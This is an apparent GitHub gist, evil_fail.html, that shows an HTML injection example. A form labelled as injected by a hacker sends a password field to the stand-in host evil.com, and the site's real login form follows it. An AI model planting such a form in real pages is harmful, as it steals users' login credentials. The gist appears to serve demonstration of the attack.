Skip to content

Instantly share code, notes, and snippets.

@intchloe

intchloe/evil_fail.html

Last active July 19, 2016 15:00
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save intchloe/d2889e4ec0a6468f7c2966c0d0202187 to your computer and use it in GitHub Desktop.
Save intchloe/d2889e4ec0a6468f7c2966c0d0202187 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
evil_fail.html
<!-- The hacker injected this (line 2-5) -->
<form action="https://evil.com" method="post" name="fblogin" id="login">
<input type="password" name="pasword" />
<input type="submit" name="login" name="fblogin">
<textarea>
</textarea><form action="/login" method="post" name="fblogin" id="login">
<input type="password" name="pasword" />
<input type="submit" name="login" name="fblogin">
</form>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment